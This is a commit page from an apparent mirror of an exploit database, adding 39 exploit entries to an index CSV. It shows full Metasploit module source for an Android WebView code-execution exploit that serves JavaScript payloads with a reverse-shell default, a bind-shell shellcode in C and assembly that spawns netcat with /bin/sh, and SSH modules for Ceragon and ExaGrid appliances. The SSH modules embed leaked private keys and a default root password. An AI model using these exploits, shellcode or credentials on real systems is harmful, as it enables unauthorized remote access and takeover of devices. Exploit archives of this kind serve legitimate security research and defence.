bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-03-24

Browse source 
39 new exploits

Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)
Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)
Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)
Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)
Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)
Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)
EMC Replication Manager < 5.3 - Command Execution (Metasploit)
MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)
Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)
CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)
Lenovo System Update - Privilege Escalation (Metasploit)
Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit)
HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)
VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)
CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)
MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)

SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)
Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)
ExaGrid - Known SSH Key and Default Password (Metasploit)
GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)
Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)
SSH - User Code Execution (Metasploit)
Redmine SCM Repository - Arbitrary Command Execution (Metasploit)

Linux/x86 - Bind Shell Shellcode (42 bytes)
Linux/x86 - Bind Shell Shellcode (44 bytes)
Joomla! Component Modern Booking 1.0 - 'coupon' Parameter SQL Injection
Flippa Clone - SQL Injection
Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)
D-Link/TRENDnet - NCC Service Command Injection (Metasploit)
Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)
MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)
OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)
OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)
WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - Unauthenticated File Upload (Metasploit)
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)
WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)
Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)
This commit is contained in:
Offensive Security 2017-03-24 05:01:16 +00:00
parent 8b5b662af9
commit 3ad96f313d
41 changed files with 6999 additions and 10 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

43
files.csv
View file

@ -8867,6 +8867,23 @@ id,file,description,date,author,platform,type,port
41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0
41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0
41675,platforms/android/local/41675.rb,"Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0
41681,platforms/multiple/local/41681.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-06-23,Metasploit,multiple,local,0
41682,platforms/multiple/local/41682.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local,0
41683,platforms/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,multiple,local,0
41700,platforms/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,windows,local,0
41701,platforms/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)",2014-12-16,Metasploit,windows,local,0
41702,platforms/windows/local/41702.rb,"Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)",2013-03-12,Metasploit,windows,local,0
41704,platforms/windows/local/41704.rb,"EMC Replication Manager < 5.3 - Command Execution (Metasploit)",2011-02-27,Metasploit,windows,local,0
41705,platforms/windows/local/41705.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-10-19,Metasploit,windows,local,0
41706,platforms/windows/local/41706.rb,"Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)",2015-12-08,Metasploit,windows,local,0
41707,platforms/windows/local/41707.rb,"CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)",2011-07-25,Metasploit,windows,local,0
41708,platforms/windows/local/41708.rb,"Lenovo System Update - Privilege Escalation (Metasploit)",2015-04-12,Metasploit,windows,local,0
41709,platforms/windows/local/41709.rb,"Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit)",2013-01-31,Metasploit,windows,local,0
41710,platforms/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local,0
41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0
41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0
41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15358,7 +15375,15 @@ id,file,description,date,author,platform,type,port
41614,platforms/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,multiple,remote,8080
41638,platforms/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,windows,remote,0
41666,platforms/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",windows,remote,0
41672,platforms/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-03-22,Metasploit,windows,remote,0
41672,platforms/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,windows,remote,0
41679,platforms/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,linux,remote,22
41680,platforms/linux/remote/41680.rb,"ExaGrid - Known SSH Key and Default Password (Metasploit)",2016-04-07,Metasploit,linux,remote,22
41684,platforms/multiple/remote/41684.rb,"GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,multiple,remote,0
41689,platforms/multiple/remote/41689.rb,"Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)",2015-06-16,Metasploit,multiple,remote,0
41690,platforms/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote,0
41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)",2003-03-07,Metasploit,multiple,remote,0
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15986,7 +16011,7 @@ id,file,description,date,author,platform,type,port
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (42 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
@ -37582,3 +37607,17 @@ id,file,description,date,author,platform,type,port
41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0
41665,platforms/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",php,webapps,0
41671,platforms/hardware/webapps/41671.txt,"Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities",2017-03-22,"SEC Consult",hardware,webapps,0
41673,platforms/php/webapps/41673.txt,"Joomla! Component Modern Booking 1.0 - 'coupon' Parameter SQL Injection",2017-03-22,"Hamed Izadi",php,webapps,0
41674,platforms/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps,0
41676,platforms/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps,0
41677,platforms/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps,0
41678,platforms/linux/webapps/41678.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-01,Metasploit,linux,webapps,0
41685,platforms/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps,0
41686,platforms/multiple/webapps/41686.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps,0
41687,platforms/multiple/webapps/41687.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps,0
41688,platforms/multiple/webapps/41688.rb,"PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)",2016-12-26,Metasploit,multiple,webapps,0
41691,platforms/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,multiple,webapps,0
41692,platforms/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - Unauthenticated File Upload (Metasploit)",2016-05-04,Metasploit,multiple,webapps,0
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0

Can't render this file because it is too large.

161
platforms/android/local/41675.rb Executable file
View file

@ -0,0 +1,161 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/android'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Android
VULN_CHECK_JS = %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
autopwn_info(
:os_name => OperatingSystems::Match::ANDROID,
:arch => ARCH_ARMLE,
:javascript => true,
:rank => ExcellentRanking,
:vuln_test => VULN_CHECK_JS
)
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
'Description' => %q{
This module exploits a privilege escalation issue in Android < 4.2's WebView component
that arises when untrusted Javascript code is executed by a WebView that has one or more
Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
APIs exposed by the Interface and execute arbitrary commands.
Some distributions of the Android Browser app have an addJavascriptInterface
call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
4.1.2 release of Android is known to be vulnerable.
A secondary attack vector involves the WebViews embedded inside a large number
of Android applications. Ad integrations are perhaps the worst offender here.
If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
into the page displayed in the WebView, then you can inject the html/js served
by this module and get a shell.
Note: Adding a .js to the URL will return plain javascript (no HTML markup).
},
'License' => MSF_LICENSE,
'Author' => [
'jduck', # original msf module
'joev' # static server
],
'References' => [
['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
['URL', 'http://50.56.33.56/blog/?p=314'],
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
['CVE', '2012-6636'], # original CVE for addJavascriptInterface
['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
['EDB', '31519'],
['OSVDB', '97520']
],
'Platform' => ['android', 'linux'],
'Arch' => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
'Targets' => [ [ 'Automatic', {} ] ],
'DisclosureDate' => 'Dec 21 2012',
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_name => OperatingSystems::Match::ANDROID,
:vuln_test => VULN_CHECK_JS,
:vuln_test_error => 'No vulnerable Java objects were found in this web context.'
}
))
deregister_options('JsObfuscate')
end
# Hooked to prevent BrowserExploitServer from attempting to do JS detection
# on requests for the static javascript file
def on_request_uri(cli, req)
if req.uri =~ /\.js/
serve_static_js(cli, req)
else
super
end
end
# The browser appears to be vulnerable, serve the exploit
def on_request_exploit(cli, req, browser)
arch = normalize_arch(browser[:arch])
print_status "Serving #{arch} exploit..."
send_response_html(cli, html(arch))
end
# Called when a client requests a .js route.
# This is handy for post-XSS.
def serve_static_js(cli, req)
arch = req.qstring['arch']
response_opts = { 'Content-type' => 'text/javascript' }
if arch.present?
print_status("Serving javascript for arch #{normalize_arch arch}")
send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
else
print_status("Serving arch detection javascript")
send_response(cli, static_arch_detect_js, response_opts)
end
end
# This is served to requests for the static .js file.
# Because we have to use javascript to detect arch, we have 3 different
# versions of the static .js file (x86/mips/arm) to choose from. This
# small snippet of js detects the arch and requests the correct file.
def static_arch_detect_js
%Q|
var arches = {};
arches['#{ARCH_ARMLE}'] = /arm/i;
arches['#{ARCH_MIPSLE}'] = /mips/i;
arches['#{ARCH_X86}'] = /x86/i;
var arch = null;
for (var name in arches) {
if (navigator.platform.toString().match(arches[name])) {
arch = name;
break;
}
}
if (arch) {
// load the script with the correct arch
var script = document.createElement('script');
script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
script.setAttribute('type', 'text/javascript');
// ensure body is parsed and we won't be in an uninitialized state
setTimeout(function(){
var node = document.body \|\| document.head;
node.appendChild(script);
}, 100);
}
|
end
# @return [String] normalized client architecture
def normalize_arch(arch)
if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
end
def html(arch)
"<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>"
end
end

16
platforms/lin_x86/shellcode/41631.c
View file

@ -4,39 +4,41 @@
# This shellcode will listen on random port and show you how deep the rabbit hole goes
# Please note that ports below 1024 require high privileges to bind!
# Shellcode Author: ALEH BOITSAU
# Shellcode Length: 42 bytes!)
# Shellcode Length: 44 bytes!)
# Tested on: Debian GNU/Linux 8/x86_64
# Command: gcc -m32 -z execstack super_small_bind_shell2.c -o super_small_bind_shell2
global _start
section .text
global _start
_start:
xor eax, eax
push eax
xor edx, edx
push edx
push 0x68732f2f ;-le//bin//sh
push 0x6e69622f
push 0x2f656c2d
mov edi, esp
push eax
push edx
push 0x636e2f2f ;/bin//nc
push 0x6e69622f
mov ebx, esp
push eax
push edx
push edi
push ebx
mov ecx, esp
xor eax, eax
mov al,11
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x52\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n",strlen(shellcode));

146
platforms/linux/remote/41679.rb Executable file
View file

@ -0,0 +1,146 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Auxiliary::Report
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info, {
'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
'Description' => %q{
Ceragon ships a public/private key pair on FibeAir IP-10 devices
that allows passwordless authentication to any other IP-10 device.
Since the key is easily retrievable, an attacker can use it to
gain unauthorized remote access as the "mateidu" user.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => [
'hdm', # Discovery
'todb' # Metasploit module and advisory text (mostly copy-paste)
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-0936'],
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
],
'DisclosureDate' => "Apr 01 2015", # Not a joke
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user)
factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
opt_hash = {
auth_methods: ['publickey'],
port: rport,
key_data: [ key_data ],
use_agent: false,
config: false,
proxy: factory,
non_interactive: true
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, user, opt_hash)
end
rescue Rex::ConnectionError
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
ssh_socket = nil
return conn
else
return nil
end
end
def exploit
conn = do_login("mateidu")
if conn
print_good "#{rhost}:#{rport} - Successful login"
handler(conn.lsock)
end
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
-----END RSA PRIVATE KEY-----
EOF
end
end

196
platforms/linux/remote/41680.rb Executable file
View file

@ -0,0 +1,196 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::SSH
def initialize(info = {})
super(update_info(info, {
'Name' => 'ExaGrid Known SSH Key and Default Password',
'Description' => %q{
ExaGrid ships a public/private key pair on their backup appliances to
allow passwordless authentication to other ExaGrid appliances. Since
the private key is easily retrievable, an attacker can use it to gain
unauthorized remote access as root. Additionally, this module will
attempt to use the default password for root, 'inflection'.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => ['egypt'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-1560' ], # password
[ 'CVE', '2016-1561' ], # private key
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
],
'DisclosureDate' => "Apr 07 2016",
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(ssh_options)
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, 'root', ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true)
ssh_socket = nil
return conn
else
return false
end
end
# Ghetto hack to prevent the shell detection logic from hitting false
# negatives due to weirdness with ssh sockets. We already know it's a shell
# because auth succeeded by this point, so no need to do the check anyway.
module TrustMeItsAShell
def _check_shell(*args)
true
end
end
def exploit
payload_instance.extend(TrustMeItsAShell)
factory = ssh_socket_factory
ssh_options = {
auth_methods: ['publickey'],
config: false,
use_agent: false,
key_data: [ key_data ],
port: rport,
proxy: factory,
non_interactive: true
}
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
conn = do_login(ssh_options)
unless is_success?(conn, true)
ssh_options[:auth_methods] = ['password']
ssh_options[:password] = 'inflection'
ssh_options.delete(:key_data)
conn = do_login(ssh_options)
is_success?(conn, false)
end
end
def is_success?(conn,key_based)
if conn
print_good "Successful login"
service_data = {
address: rhost,
port: rport,
protocol: 'tcp',
service_name: 'ssh',
workspace_id: myworkspace_id,
}
credential_data = {
username: 'root',
private_type: ( key_based ? :ssh_key : :password ),
private_data: ( key_based ? key_data : 'inflection' ),
origin_type: :service,
module_fullname: fullname,
}.merge(service_data)
core = create_credential(credential_data)
login_data = {
core: core,
last_attempted: Time.now,
}.merge(service_data)
create_credential_login(login_data)
handler(conn.lsock)
true
else
false
end
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
